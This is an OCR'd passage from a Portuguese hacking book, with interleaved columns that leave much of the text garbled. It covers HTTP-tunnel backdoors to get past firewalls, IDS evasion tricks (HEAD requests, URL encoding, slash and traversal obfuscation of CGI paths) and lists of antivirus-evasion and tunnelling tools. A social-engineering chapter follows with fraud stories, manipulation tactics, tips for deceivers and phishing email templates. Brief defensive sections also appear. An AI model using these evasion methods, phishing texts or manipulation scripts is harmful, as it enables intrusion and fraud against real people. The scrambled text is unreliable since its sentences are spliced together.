configuraes do Essa porta dos fundos deve funcionar atravs de qualquer O comando GET enviado do host interno (escravo)
proxy (seu endereo, se necessita de login e senha). Esse firewall que justamente o
o primeiro permita aos usurios surfar na Web. Para entender prompt de comandos do shell, a resposta do mestre o
passo a ser tomado. As abas User options e Diagnostic melhor como ele comando ls (listar
Tools no vo funciona, d uma olhada no diagrama a seguir. O link diretrios em Linux), tambm codificado em Base64.
para baixar a Como o cdigo est
em linguagem de script (Perl) voc pode modificar e de IDS tenta se comportar como um servidor Web real, deteco os identifique como um ataque real. Alguns
mudar parmetros ao scanners, como o
como endereo do proxy, necessidade de usurio e senha custo de cdigo adicional e maior lentido, criando uma Syhunt, j possuem algumas dessas opes embutidas,
etc. Essa uma espcie de honeypot. Exemplo de IDS: RealSecure. como voc pode
das excelentes opes para acessar de modo oculto Puro: Tambm referido como sistemas de deteco do ver:
sistemas de uma rede tipo engole pacotes, ele tipicamente somente verifica os 120
interna por trs de firewalls. dados puros por strings de texto. O nico benefcio desse Esse programa no o nico; muitos scanners de CGI
Aqui encerramos os mtodos de se burlar firewalls. mtodo simplesmente a velocidade. Nele, o IDS lida (como Whisker, por
Existem variaes diretamente com os dados brutos, capturados exemplo) implementam tambm recursos de ocultao do
das tcnicas citadas, mas, de modo geral, esses so os diretamente, sem tentar se passar pelos protocolos e sistema IDS.
nicos meios de se interpretar a informao. Em minha opinio, esse o Vamos ver alguns mtodos conhecidos como exemplo:
conseguir efetivamente um acesso passando por cima de melhor tipo de sistema de deteco. Exemplo de IDS: 8.3.1 Combinando Mtodos
possveis filtros de Dragon e Snort. Muitos sistemas de IDS falham ao assumir que os pedidos
segurana, principalmente se utilizados em conjunto com Ambos os tipos possuem prs e contras e podem ser sempre usam o
programas de enganados de mtodo GET. Eles estavam procurando por assinaturas
varredura, como o j citado NMAP. Alm disso, possuem maneiras diferentes. O objetivo ofuscar o pedido para como a seguinte:
algumas boas impedir que as GET /cgi-bin/some.cgi
opes (como o P0 , no pingar o host antes de scannear assinaturas coincidam. A assinatura geralmente O truque aqui usar HEAD em vez do GET. Ficaria ento:
e considerada uma condio HEAD /cgi-bin/some.cgi
scanneamentos como Xmas, Null e outros) que ajudam no ou string (pedao de texto) que est presente nos pacotes A maioria dos sistemas de deteco no estava
processo de que atravessam detectando o pedido. Se
evitar que os pacotes sejam recusados. a rede. Na maioria das vezes, funciona assim: o IDS descobrir algum recurso, o atacante pode utilizar depois
8.3 Burlando o IDS procura uma o GET para
Um IDS nada mais do que um sniffer com regras, muitas assinatura (como, por exemplo, a string /cgi-bin/phf) no 121
vezes simples e trfego da rede e, conseguir explorar o CGI, ocultando-o novamente com
baseadas em texto puro (ASCII). O objetivo de tcnicas se encontrar, o sistema de deteco ir anunciar como se alguma das
anti-IDS fosse um ataque. prximas tticas que sero demonstradas.
modificar um pedido de tal maneira que os sistemas de Muitas vezes, quanto maior a assinatura, menos a chance 8.3.2 Codificao de URL
deteco ficaro de a string Esse truque consiste em codificar a URL com o seu
confusos, mas o servidor Web ainda conseguir entender ocorrer. Entretanto, alguns IDS checam por strings muito equivalente em
o que estamos pequenas como, caracteres de escape. O protocolo HTTP especifica que
pedindo. As tcnicas podem variar em outros protocolos e por exemplo, /phf. Mas quanto menor a assinatura, maior caracteres binrios
servios, mas, a chance de um podem ser passados para a URL usando a notao %xx,
como exemplo, estaremos nos baseando, aqui, no falso positivo. Por exemplo, a assinatura mencionada onde xx o valor
protocolo HTTP. anteriormente (/phf) em hexadecimal do caractere. Em teoria, os sistemas de
Vamos ver os dois tipos de IDS existentes hoje: ir combinar com o seguinte pedido: IDS do mtodo
119 GET /phfiles/telefones.txt HTTP/1.0 puro no conseguiriam identificar um ataque assim, j
Inteligente: Implementa lgica que realiza o O que geraria um falso positivo. Vamos analisar a que a assinatura
entendimento do protocolo-alvo (no nosso caso, HTTP). seguir alguns dos cgi-bin no corresponde string
Ele ir analisar o pedido e realizar comparao mtodos usados para mascarar o pedido e impedir que o %63%67%69%2d%62%69%6e. Tambm,
otimizada sistema de em teoria, os sistemas de deteco inteligentes seriam
de assinaturas baseado em regras conhecidas. Esse tipo capazes de detectar,
j que eles decodificariam a string do modo que um c:\temp\.\.\.\.\.\ o mesmo que c:\temp\. Para Syhunt (www.syhunt.com)
servidor Web faria conseguirmos impedir que 8.4.2 Linux
antes de checar a assinatura. Hoje, muitos dos novos sistemas de IDS puros consigam identificar assinaturas Burlando o antivrus:
sistemas j esto como /cgi-bin/phf, HexEdit (http://www-physics.mps.ohio-
realizando essa decodificao, ento, essa tcnica tende podemos mudar a string para /./cgi-bin/./phf. Isso faz state.edu/~prewett/hexedit/)
a se tornar com que os IDS Burlando o Firewall:
obsoleta com o passar do tempo. puros tenham trs opes: GNU HTTPTunnel
8.3.3 Barras Duplas e Triplas Alerte a presena de /./ e continue. (http://www.nocrew.org/software/httptunnel.html)
Consiste simplesmente em tentar enganar a deteco da Esquea que existe ; isso resulta em muitos ataques no Netwox
string exata, identificados. (http://www.laurentconstantin.com/en/netw/netwox/)
aumentando para duas ou trs barras os separadores da Logicamente substitua /./ por /, o que resulta na Netcat (http://netcat.sourceforge.net/)
URL. Exemplo: assinatura, mas RWWWShell (http://www.thc.org/releases/rwwwshell-
/teste/index.php ficaria //teste//index.php ou deixa o programa mais lento. 2.0.pl.gz)
///teste///index.php. Essa Existem outras dezenas de tcnicas e tticas de Burlando o IDS:
tcnica j est bem obsoleta tambm e nem ocultamento de strings de Whisker (www.wiretrip.net/rfp/)
implementada mais na sistemas IDS. As que eu mostrei serviram ao nosso 8.5 Soluo
maioria dos programas que realizam ocultao de IDS propsito: entender 8.5.1 Burlar o Antivrus
(mas, como voc como solues simples e imaginativas podem, muitas Voc no pode confiar 100% nos softwares de antivrus.
pode ver, alguns novos como o Syhunt ainda vezes, impedir caros e Se voc
implementam). sofisticados programas de detectar algo suspeito. desconfiar que algum esteja acessando o seu sistema e
8.3.4 Travessia de Diretrios 8.4 Softwares seu Norton,
Outro truque clssico quebrar uma assinatura tal /cgi- 8.4.1 Windows McAfee, AVG ou outro no detectar, instale um firewall
bin/test.cgi usando Burlando o antivrus: pessoal e veja se ele
travessia reversa de diretrio: XVI32 detecta alguma porta aberta que no deveria estar l.
GET /cgi-bin/blahblah/../test.cgi HTTP/1.0 (http://www.chmaas.handshake.de/delphi/freeware/xvi Outros programas
O pedido anterior levar a /cgi-bin/test.cgi assim que a 32/xvi32.htm) interessantes so os monitoradores de registros, para
travessia de PE Explorer (www.heaventools.com) verificar entradas
diretrio for realizada. Entretanto, esse truque velho e Petite (http://www.un4seen.com/petite) suspeitas, e os monitoradores de conexes, como o Active
bem conhecido. ASPACK (http://www.aspack.com/) Ports. Falaremos
Geralmente, os sistemas IDS inteligentes detectam MEW (http://northfox.uw.hu/) mais sobre cada uma dessas protees no captulo sobre
facilmente e os sistemas UPX (http://upx.sf.net/) segurana.
de deteco puros avisam o fato que o pedido contm Burlando o Firewall: 8.5.2 Burlar o Firewall
/../. Uma outra STERM (www.oxid.it) Configure uma proteo decente nas regras do firewall,
tcnica mais nova parecida com essa a dos diretrios NETCAT no s para
com auto-referncia. (http://www.softlookup.com/display.asp?ID=25576) filtrar o que entra, mas tambm o que sai. Tente somente
tambm mais difcil de ser detectada. NETWOX permitir o acesso
122 (http://www.laurentconstantin.com/en/netw/netwox/) externo a servidores Web atravs de um proxy. Se os
8.3.5 Diretrios com Auto-referncia HTTP TUNNEL (http://www.http-tunnel.com/html/) funcionrios
Truque relativamente novo quando comparado com seu RWWWSHELL (http://www.thc.org/releases/rwwwshell- necessitarem usar algum Messenger, podem usar a verso
irmo antigo. 2.0.pl.gz) on-line na
Enquanto .. significa diretrio anterior, . significa diretrio Burlando o IDS: pgina do fabricante. Isso evitaria a conexo reversa.
atual. Ento, 123 Utilize programas que
detectem presena de ARP poisoning na rede interna, meios digitais, telefnicos e at pessoalmente, observam e Pelo telefone: O engenheiro se passa por algum
como o ARP Guard, estudam voc importante, finge
evitando, assim, ataques de IP spoofing. Sobrou s o HTTP sem que sejam percebidos. E isso no algo novo que precisar de ajuda ou mesmo se oferece para ajudar. O
tunneling. Esse surgiu com a interesse dele
o mais complicado de se proteger. A opo mais informtica, h dcadas esses engenheiros vm agindo. mexer com o sentimento das pessoas, fazendo com que
simples baixar algumas Por aqui, elas
124 normalmente conhecemos essas pessoas por acabem entregando o que ele deseja sem, muitas vezes,
regras novas para o IDS baseadas no formato, alterao estelionatrios. nem
e tamanho dos Geralmente, existem trs maneiras bsicas de agir: saberem disso.
pacotes que trafegam na rede, possibilitando detectar Por e-mail ou carta: O engenheiro envia um e-mail ou 126
pequenas alteraes. carta para 9.1 Manipulando os Sentimentos
Mas no uma proteo muito eficiente. A opo seu alvo contendo informaes que ele quer. Pode ser Como j deve ter dado para perceber, o forte do
perfeita, porm impossvel pedindo um Engenheiro Social
de se implementar na maioria dos ambientes, seria documento importante ou fingindo ser do Centro de manipular os sentimentos das pessoas, levando-as a
permitir que o proxy Processamento de fazerem o que ele
acessasse somente endereos especficos (bancos, site da Dados e requerendo uma mudana de senha. De quer. Vamos dar uma olhada nos casos mais comuns de
empresa, alguns qualquer maneira, manipulao, que
sites de e-mail etc.) e bloqueasse todo o resto. seja a correspondncia eletrnica ou real, quase sempre so: Curiosidade, Confiana, Simpatia, Culpa e Medo.
8.5.3 Burlar o IDS ela fica 9.1.1 Curiosidade
Esteja sempre atualizando as regras do IDS, definindo perfeita. Com o logotipo da empresa, marca dgua e e- Muitos dizem que a curiosidade a me do conhecimento.
regras mail de Sabendo
personalizadas para o seu ambiente corporativo e origem parecendo que vem mesmo da empresa. Tudo disso, o engenheiro social vai tentar atiar de todas as
instalando mdulos extras para gerar maneiras a
no sistema de deteco de intrusos, se disponveis. Todo o confiana. curiosidade dos empregados da empresa-alvo. Existem
cuidado pouco Pessoalmente: o mtodo mais arriscado, mas tambm vrias tcnicas para
para evitar que possveis ataques passem despercebidos o mais se fazer isso, desde o envio de um falso carto por e-mail
e causem um eficiente. O engenheiro arruma um bom terno, um relgio (o que
grande estrago no seu sistema. com geralmente barrado antes de chegar nos funcionrios) at
125 aparncia de caro e uma maleta com um notebook. Pode tcnicas que
9 Engenharia Social se passar parecem absurdas primeira vista, mas que funcionam.
Neste captulo, j comeamos a tomar rumos diferentes por um cliente, por um funcionrio ou mesmo parceiro de Veja o exemplo a
da seqncia negcios. seguir:
original. Este o primeiro dos quatro caminhos que As possibilidades so infinitas, j que as pessoas tendem Daniel Lopes um mentiroso nato. Mestre na arte de
podem ser tomados a confiar enganar, ganha a
(verificar o diagrama no incio do livro), geralmente mais em algum muito bem vestido. Outra coisa que eles vida como espio industrial e comercial. A pessoa que o
utilizado quando no h tendem a contratou lhe
falha a ser explorada e nem uma m configurao do fazer pessoalmente: revirar o lixo de uma empresa em forneceu mais um servio importante: ele teria que
sistema detectada. busca de conseguir roubar o
Os engenheiros sociais so pessoas cultas, de um papo informaes importantes, como listas de empregados ou banco de dados com informaes de clientes de uma
agradvel e qualquer grande empresa
que conseguem fazer com que voc caia em suas outra coisa que beneficie a Engenharia Social. alimentcia. Infelizmente nessa empresa ele no conhecia
armadilhas. Utilizando ningum que
facilitasse o acesso e tentou fazer uma ligao para a vez por semana, ele aguardou uma falha grave no Riiiing Riiing (Telefone tocando)
atendente, mas no navegador Internet Paulo Al?
conseguiu fornecer bons argumentos para que ela Explorer ser divulgada em um sbado ou domingo. No Melissa Senhor Paulo? Aqui quem fala a Melissa,
digitasse alguns deu outra, leu operadora da
comandos no seu computador. Com medo de que ela sobre uma falha que havia acabado de sair, permitindo VisaNet. Gostaria de avisar que a sua mudana de
desconfiasse, Daniel que se executasse endereo j foi
agradeceu e desligou. softwares locais na mquina atravs do navegador sem efetuada. Mais alguma coisa que o senhor deseja
Como ele faria ento? Teve uma idia. Vestiu-se com um que o usurio conosco?
belo terno e se percebesse. Paulo Mudana de endereo? Eu no requisitei nenhuma
apresentou segurana como um investidor internacional Daniel, ento, fez algo indito. Pagou 800 reais para mudana...
da empresa, colocar um outdoor, 128
citando nomes de vrias pessoas que trabalhavam l bem em frente empresa, com as palavras: Compre seu Melissa Senhor, nos nossos registros, consta um pedido
dentro. Claro, ele celular de ltima feito anteontem
pesquisou as pessoas que estariam de frias na ocasio e gerao de modo fcil: entregue seu aparelho antigo e, tarde, logo depois de efetuar a compra das passagens
as citou. Aps ter com mais um real, de avio da
a entrada liberada, ele dirigiu-se para o elevador mais escolha aquele que voc quiser ter empresa Varig.
movimentado da www.celular1real.com.br. Esse site, Paulo Hei, garota, eu no comprei passagem nenhuma...
empresa. Subiu com ele para o ltimo andar. Depois de claro, estava preparado com a falha descoberta. O tem algum
todos deixarem o outdoor foi colocado na usando meu nmero indevidamente! (gritando ao telefone)
elevador, Daniel tirou cuidadosamente um CD de seu tera-feira tarde. At sexta-feira, Daniel j havia tido Melissa Vou olhar isso agora para o Senhor. Posso
bolso e colocou no acesso a vinte cancelar esses
piso do elevador. Na capa do CD estava escrito Fotos computadores. pedidos daqui, s preciso confirmar alguns dados. O
Comprometedoras 9.1.2 Confiana nmero do carto
No abrir. Despistadamente, ento, ele deixou o prdio A confiana tambm um fator muito manipulado pelos mais o dgito identificador.
e foi checar o seu engenheiros Paulo disse o nmero do carto. Melissa pediu mais
notebook com conexo rdio. Meia hora depois, ele sociais. Ela pode ser gerada de vrias maneiras: voc informaes.
conseguiu um acesso pode se passar por Melissa Qual a data de vencimento? E o seu nome
para dentro da empresa. Isso porque algum no um funcionrio de outra filial, citar procedimentos tcnicos completo, como
agentou de curiosidade do manual da est escrito no carto?
e abriu o contedo do CD no seu computador da empresa ou, simplesmente, oferecer-se para ajudar com Por um momento, Paulo desconfiou. Melissa percebeu e
empresa. algum problema. imediatamente
127 Outra coisa comum voc receber um e-mail com o disse:
Em outro trabalho parecido, a segurana no deixou endereo de origem de Melissa Senhor, esse um procedimento padro. Eu
Daniel passar. Ele um amigo ou colega de trabalho e esse e-mail vir com um possuo todos os
pensou, ento, em outro mtodo. Ouviu pessoas da anexo. Sempre seus dados aqui, a checagem apenas para lhe fornecer
empresa comentando passe o antivrus antes. Isso porque e-mails podem uma segurana.
que todas as sextas-feiras o seu computador reiniciava facilmente ser forjados, Afinal, qualquer pessoa poderia tentar se passar por
sozinho. Daniel tome muito cuidado, pois uma das maiores formas de voc. Para lhe
deduziu que isso se dava devido instalao de patchs Engenharia Social. comprovar, seu nome completo Paulo Azevedo Braga.
de segurana No geral, todos esses fatores fazem com que a sua Paulo Tudo bem (respirando aliviado). A minha data de
naquelas mquinas e bolou um plano. Como a resistncia a entregar vencimento
atualizao era feita s uma informaes fique mais fraca. Um exemplo a seguir: 08/2007.
Melissa Ok. Tudo verificado. Estarei entrando em parecia ser um homem com seus vinte e poucos anos. uma com a voz to bonita.
contato com o senhor - Oi, aqui do suporte tcnico AX44, estamos com um 9.1.4 Culpa
logo que cancelar o pedido das passagens e a mudana problema grave. A Quando as pessoas se sentem culpadas por algum motivo,
de endereo. chuva derrubou um poste e comprometeu grande parte so mais
Paulo ficou muito satisfeito pelo atendimento rpido e da fiao da regio propensas a ajudar. Isso no deixa de ser verdade no
dedicado daquela na qual estou. J tentei ligar para o Centro de Ajuda aos meio da Engenharia
pessoa. S percebeu que havia cado em um golpe Tcnicos, mas Social. Inflita culpa em algum e faa essa pessoa lhe
quando viu o seu parece que est superlotado. Parece que no foi s aqui ajudar no que voc
extrato do carto de crdito. Havia contas absurdas. que andou caindo quiser. Dentro de uma empresa, os funcionrios mais
9.1.3 Simpatia a energia. Voc poderia me ajudar, por favor? Jane vulnerveis a essa
Outro grande modo de manipulao. O melhor exemplo reforou a ltima emoo so os novatos, que esto querendo mostrar
de simpatia no frase com um tom bem sensual na voz. servio. A histria a
caso das mulheres. muito mais fcil um mulhero - O que gostaria que eu fizesse? seguir demonstra um exemplo.
conseguir ser bem - Bom, estou com uma lista de telefones aqui para serem Rodolfo j estava atuando h quase duas semanas como
sucedida na Engenharia Social com os seguranas de uma religados aps eu estagirio naquela
empresa do que arrumar a fiao. Mas, nessa chuva toda, eu acabei grande empresa. Apesar de sua especialidade ser
um homem. Isso vale para telefone tambm, afinal, se a perdendo o endereo administrao pura,
pessoa que fala de um dos nmeros. A droga do papel molhou e eu no colocaram-no a maior parte do tempo para fazer
com voc tem uma voz doce e meiga, inconscientemente consigo ler nada. digitao, planilhas e
voc acaba Mas que droga! Bem que eu queria estar em casa consultas no banco de dados da rede. Ele teve certa
129 debaixo das cobertas dificuldade, afinal,
descartando a possibilidade daquela pessoa tentar lhe agora. pssimo em lidar com computadores. Mas as pessoas
passar a perna. Na O operador riu. Respondeu que tambm j teve dias foram legais e
seqncia, voc v um exemplo: difceis no trabalho, e acabaram ajudando-o.
Jane Soares uma detetive particular, especializada em disse ainda: Um dia ele recebeu um telefonema estranho. A pessoa
descobrir puladas - Acho que no tem problema em ajudar uma colega em identificou-se como
extraconjugais. Uma de suas clientes tinha certeza de apuros. Qual o sendo do CPD da empresa, que ficava em um prdio
que o marido a nmero? diferente do de
estava traindo e pediu Jane que investigasse. A nica - 38271998. Rodolfo.
dica que ela tinha - S um minuto. Sim, aqui est: Rua Hugo Santos, 90, - Al, quem fala?
era um telefone estranho que sua cliente havia visto no apartamento 205, - Rodolfo Rosa, quem fala?
celular do esposo Santa Mnica. - Aqui o Hugo do CPD da YSxL (nome da empresa).
enquanto este tomava banho. Jane acreditava que esse - Oh! Que timo! Estou aqui perto j. Muito obrigada, Rapaz, o que voc
telefone, que era amorzinho, voc foi andou aprontando por a?
um nmero fixo, poderia ser da residncia da outra. Ela muito prestativo. Precisando de algo, s falar comigo... O estagirio novato comeou a suar frio com aquele tom
teria ento que completou de voz.
conseguir um mtodo de descobrir o endereo por trs do Jane. - Como assim?
nmero. 130 - Ora, um vrus que est partindo do seu computador
Aps pensar um pouco, ela ligou para a companhia - Sem problemas... respondeu o operador sem perceber infectou grande parte
telefnica: a trapaa e dos nossos sistemas aqui. Isso pode ser um grande
- TeleRio, em que posso ajudar? perguntou um achando muito bom ter ajudado uma colega com problema para voc...
atendente que, pela voz, problemas, especialmente
*Glup* Rodolfo engoliu seco. Mesmo no sabendo como Geralmente, as ameaas parecem vir de pessoas com - Olha suspirou a secretria se vocs esto com
aquele vrus foi uma hierarquia bem problemas a e no
sair do sistema dele, sentiu-se culpado por criar maior que a do alvo dentro da empresa. Afinal, se um receberam meu e-mail no da minha conta. S sei que
problemas. colega lhe ordenasse preciso desse
- O que eu posso fazer para arrumar? perguntou. alguma coisa, voc riria dele. Mas, e o vice-presidente da relatrio aqui o mais rpido possvel ou cabeas iro
131 empresa? rolar, inclusive as
- Da no pode fazer nada, seu acesso restrito. Vou Exemplo a seguir: nossas.
quebrar o seu galho. A ReRodrigues uma empresa especializada em gerar - No d pra fazer isso rpido assim, temos um protocolo
Faz o seguinte: como no posso ir a, pois nossos prdios relatrios para os e...
so bem executivos de empresas maiores, fundada por Rodrigo da - Faz o seguinte, vou te passar para o vice-presidente. Ele
distantes, posso arrumar o seu computador atravs da Costa. Muitas no to
rede. Para isso, empresas grandes terceirizam esse servio com eles, o tolerante quanto eu.
preciso do seu usurio e senha de acesso. que acaba fazendo Rodrigo sentiu um frio na espinha.
*Ooops... * pensou Rodolfo. Por que justamente o com que muitas informaes preciosas dessas empresas - Olha, moa, me manda o tipo de relatrio que te passo.
administrador passem pela - Para adiantar, me manda por e-mail o relatrio. Eu
precisaria da minha senha? ReRodrigues. Claro, eles possuem um contrato de imprimo aqui.
Mas, antes que ele dissesse alguma coisa, a pessoa no confidencialidade entre Coloque todas as transaes comerciais realizadas no
telefone continuou: si. ltimo ms, com os
- Claro que eu poderia procurar a sua senha aqui no Em um sbado pela manh, Rodrigo recebeu uma ligao nomes e contatos dos clientes. Meu e-mail
sistema, mas isso vai do seu maior vicepresidente@duveh.cjb.net. Mande o mais rpido
demorar um pouco e o vrus pode causar ainda mais cliente, um grande laboratrio farmacutico. Era uma possvel.
estragos nesse mulher, com uma - Pode deixar, estarei enviando daqui a uma hora no
tempo. O que voc prefere? 132 mximo respondeu
- Tudo bem, ento respondeu Rodolfo. Meu nome de voz um pouco rouca. Rodrigo.
usurio rodorosa - ReRodrigues, no que posso ajudar? 133
e minha senha bsb2281. - Ol, aqui do gabinete do vice-presidente da Duveh, 9.2 Como Lidar com Diferentes Pessoas
- Ok, est anotado. Escuta, preciso que voc faa o logoff sou Talita, sua O maior problema do engenheiro social, s vezes,
da sua mquina secretria. saber como lidar
por uns dez minutos. Logo que eu acabar de remover o Era a primeira vez que Rodrigo recebia uma ligao do com determinado tipo de pessoa. Voc est falando com
vrus, eu te ligo alto-escalo da algum
para voc entrar de novo. empresa. Continuou: aparentemente calmo e, de repente, aquela pessoa fica
- Estarei aguardando. - Sim, do que voc precisa? nervosa, se torna
At hoje ele aguarda pela ligao. Foi mandado embora A mulher mudou o tom de voz para um mais cnico. desagradvel ou se faz de cnica. Devemos aprender
pouco tempo - Bom, sabe o que ? O relatrio de hoje de vocs como reconhecer e
depois. simplesmente no lidar com diferentes tipos de pessoas. Isso importante se
9.1.5 Medo chegou. voc est
A manipulao do medo uma das mais poderosas, pois - Relatrio? Mas no foi requerido nenhum para hoje. querendo realizar um teste humano no seu Penetration
tende a obter - Como no? Eu mesma havia feito o pedido do relatrio Test e realizar
resultados muito rpidos. Isso porque ningum consegue via e-mail. Era Engenharia Social nos diferentes funcionrios de sua
agentar a para ser entregue hoje. empresa para ver
presso por muito tempo e acaba entregando as - No recebi nenhum e-mail. como eles reagiriam a uma situao real.
informaes rapidamente. Tipos de
pessoas calma. Controle Faa o que eles
Como prprio. Tambm use esperam. Seja eficiente
reconhecer de temor e medo. e eficaz. Cortesia e
Como lidar Duvidosos 135
134 Crticos, indiferentes, considerao.
Nervosos silenciosos, perguntam Conquiste-os
Parecem cansados e demais. rapidamente e use a
com raiva. Inquietos, Conhecimento da curiosidade.
impacientes. Pisando empresa, tato, 9.3 Dicas de um Engenheiro Social Annimo
duro. Falam muito e perseverana. Ser Seja profissional: Voc no quer que a pessoa
alto e reclamam convincente. Citar seu desconfie, j que
demais. conhecimento de est criando uma iluso. Tente transparecer confiana.
Pacincia, normas e seus limites. Fique calmo: D a impresso que voc pertence quele
tranqilidade, Silenciosos local.
considerao, No tm Conhea sua marca: Conhea seu inimigo. Saiba
educao, calma, conhecimento. Podem exatamente como
presteza, agilidade e ser pensadores. Podem ele ir reagir antes que o faa.
sangue frio. Empatia, estar fingindo saber. No tente enganar algum esperto: Isso resultar em
ateno redobrada e Podem estar infelizes. desastre.
bom humor. Use o Faa-lhes uma Sempre existem pessoas mais ingnuas.
medo se necessrio. pergunta que os leve a Planeje sua fuga: Se algum suspeitou, no entre em
Indecisos responder algo que pnico e
Apreensivos. Querem gere mais confiana. corra. Salve a fonte.
conversar mais sobre o Espere pela resposta. Tente parecer uma mulher: Est provado que as
assunto. Receosos de Esteja atento s mulheres do
cometer erros. Faltalhes deixas. Tenha mais confiana ao telefone. Use isso como vantagem. Use
segurana. considerao e a ajuda de
Moderao, calma, cortesia. uma mulher se necessrio.
cortesia, confirme a Dependentes Marcas dgua: Aprenda a faz-las. So importantes
opinio dele prprio. Tmidos e sensitivos em e-mails e
Demonstre (sensveis). Indecisos. correios falsos.
conhecimento e Velhos, surdos e Cartes de apresentao e nomes falsos: Use-os para
pacincia. Use a mudos. Infantis. impressionar e parecer profissional.
simpatia. Estrangeiros. Use um time se for necessrio: No seja arrogante e
Desagradveis Fceis de convencer. autoconfiante. Se precisar de ajuda, consiga.
Cticos (descrentes), Gentileza, deciso. Use 9.4 Truques Aplicados na Informtica
perguntadores, a simpatia, pense por Os engenheiros sociais tambm aplicam vrios truques
conversadores, eles, ajude-os, seja utilizando a
insultantes. claro. informtica, visando obter informaes e dados
Franqueza, De bom senso importantes que,
conhecimento, Agradveis e normalmente, no seriam to facilmente entregues. Um
agilidade, cortesia, inteligentes. desses truques
fazer com que alguma pessoa pense que est recebendo faz. 10.000 reais entre seus clientes e voc foi um dos
e-mail de um Uma outra tcnica utilizada pelos engenheiros sociais (e ganhadores. O MeuBanco
amigo qualquer com um anexo, quando, na realidade, vrus) mandar lhe d os parabns, querido cliente. Entre na sua conta
uma ferramenta de para voc um arquivo ZIP (compactado), com a senha agora clicando aqui
invaso (uma porta dos fundos, por exemplo) que, se for para descompactar e receba o seu prmio.
instalada, dar no corpo do e-mail. Isso barra o antivrus e fornece uma Atualmente, muitos bancos no enviam e-mails para os
acesso total ao sistema para o invasor. Se voc recebesse falsa sensao de clientes, a no ser
um e-mail assim confiana (outro atributo importante ao estelionatrio), que estes solicitem. Os engenheiros sociais so to caras-
de um amigo e seu antivrus nada detectasse (j vimos pois passa a de-pau que,
que fcil esconder 137 muitas vezes, colocam isso nos e-mails de phishing para
dele esses programas) voc executaria o anexo? Pense impresso de que a pessoa est lhe mandando um gerar confiana,
nisso. Veremos arquivo importante e que sendo que o cliente no se lembra se ativou ou no o
algumas artimanhas desse tipo aqui. confiou a senha a voc. Essa tcnica mostrada a seguir: servio. Nosso
9.4.1 E-mail Phishing Est vendo o arquivo suspeito? Se voc digitar a senha primeiro exemplo modificado mostra isso a seguir.
A ferramenta mais utilizada da Internet hoje de longe o mostrada Prezado cliente, por motivos de segurana, pedimos que
e-mail. anteriormente no corpo do e-mail (57317), possivelmente modifique sua
Correspondemo-nos instantaneamente com quem vai encontrar um senha de acesso. Clique aqui para faz-lo. O MeuBanco
quisermos, na hora em arquivo executvel prontinho para ser rodado e instalar no envia e-mails
136 algum tipo de aos usurios sem autorizao. Se voc no deseja mais
que desejarmos. Justamente por isso ele uma das malware (software malicioso) no seu sistema. Muitas vezes receber o EBanking,
principais ferramentas esses e-mails se clique aqui para acessar sua conta e desabilitar o
usadas pelos engenheiros sociais e vrus para ganhar disfaram tambm de cartes virtuais, convites e, o pior, servio.
acesso ao seu de instituies Nesse e-mail, existe um link para o site do banco, s que,
computador. Como isso acontece? Atravs de anexos de financeiras. na realidade,
arquivos no e-mail. Esse tipo de tcnica a grande responsvel pelos um site falso, feito para se parecer exatamente como o
O mais comum voc receber um e-mail estranho, de ataques de phishing original e ele
algum que voc no (pescaria) hoje em dia. Um ataque desses consiste em realmente engana muita gente. A seguir, uma imagem de
conhece, com um arquivo anexado. enviar um e-mail um site clonado
No exemplo anterior, o e-mail marcado provavelmente falso (ver na prxima seo como simples de se fazer), feito para se parecer exatamente com o original (o nome
um vrus ou geralmente para do banco foi
ferramenta de invaso que utiliza alguma mensagem que os clientes de algum banco ou instituio financeira, removido da imagem para fins de resguardo).
faa atiar a fazendo com que o email 139
curiosidade de quem o recebe (lembre-se, a curiosidade parea ter vindo do prprio banco (algo como Esse, como muitos outros sites falsos de instituies
uma das tcnicas <gerencia@meubanco.com.br>). Alguns dos assuntos financeiras,
mais usadas, como vimos anteriormente). Note o cone do contidos nesses emails: engana facilmente as pessoas. A mdia vrias vezes se
clipe que est na 138 refere aos
frente do nome de quem enviou a mensagem. Significa Prezado cliente, por motivos de segurana, pedimos que realizadores de phishing como hackers. Isso um ultraje
que a mensagem modifique sua quelas pessoas
veio com um anexo. Como eu no conheo essa pessoa, e senha de acesso. Clique aqui para faz-lo. que procuram apenas o conhecimento, j que no
tenho suspeitas Meus parabns! O banco MeuBanco acabou de sortear necessrio um
quanto ao arquivo, imediatamente apago o e-mail. Mas um prmio de conhecimento tcnico para se mandar um e-mail falso e
muita gente no o enganar algum. O
que temos aqui, sim, so engenheiros sociais com pssimas informao falsa, como voc assinar outro nome ao invs isso j no funciona tanto, pois a maioria desses
intenes. do seu. Perceba, messengers j mostra
Vamos ver como eles conseguem enviar o e-mail de forma no fim do programa, a informao: Mail sent to ... e o automaticamente uma imagem da pessoa. Ento, esses
annima, e-mail na frente. engenheiros se
tentando se passar por quem no so. Significa que o e-mail foi enviado com sucesso. Se o utilizam da sua confiana e simpatia para dizer que o
9.4.2 E-mail Falso sistema anti-spam de arquivo um jogo
O e-mail falso ou simplesmente fake mail uma tcnica algum provedor bloquear o e-mail de chegar (faa testes interessante, um projeto inacabado qualquer no qual ele
muito antes para saber quer a sua opinio,
utilizada hoje na Internet para se enviar e-mail sem ser isso), voc pode ir em Advanced e configurar o cabealho ou mesmo um programa para magicamente incluir
identificado. Bom, da mensagem crditos nos celulares.
pelo menos para o remetente, pois muitas vezes o para o que voc quiser, fazendo, assim, ela passar pela As tcnicas so inmeras. Mas, a, voc diz: o MSN
endereo IP original maioria dos filtros Messenger, em suas
ainda continua sendo mostrado no e-mail. Quais as dos provedores. verses mais novas, bloqueia o envio de arquivos
vantagens disso para a 141 executveis. Sim, mas
Engenharia Social? Como a maioria dos usurios leigo e Pouco tempo depois, o e-mail estava na caixa de entrada isso pode ser facilmente burlado atravs de patchs
nunca iriam do meu Outlook. (atualizaes)
conferir o endereo para ver se bate, os engenheiros Vendo as propriedades do e-mail anterior, observe que disponveis na Internet, como o A-Patch, disponvel para
sociais podem fingir realmente download em
ter vindo de qualquer e-mail. Antigamente, podamos parece ter vindo do nosso e-mail falso. Essa tcnica, <www.messbrasil.com.br>.
fazer isso at usando extremamente simples 9.5 Soluo
140 de se fazer (praticamente s enviar a mensagem e Veremos algumas dicas para se proteger contra os
programas como o prprio Outlook, atravs de uma falha pronto), a mais ataques de
nos servidores utilizada hoje pelos engenheiros sociais para executar Engenharia Social, especialmente no ambiente
SMTP (uma m configurao, na realidade) que permitia cavalos de tria, corporativo. Para comear,
o relay. Hoje ferramentas de capturar o teclado ou mesmo roubar as estratgias devem ser tanto no nvel fsico (meio pelo
difcil encontrar servidores assim, ento, enviamos os e- dinheiro de outras qual o engenheiro
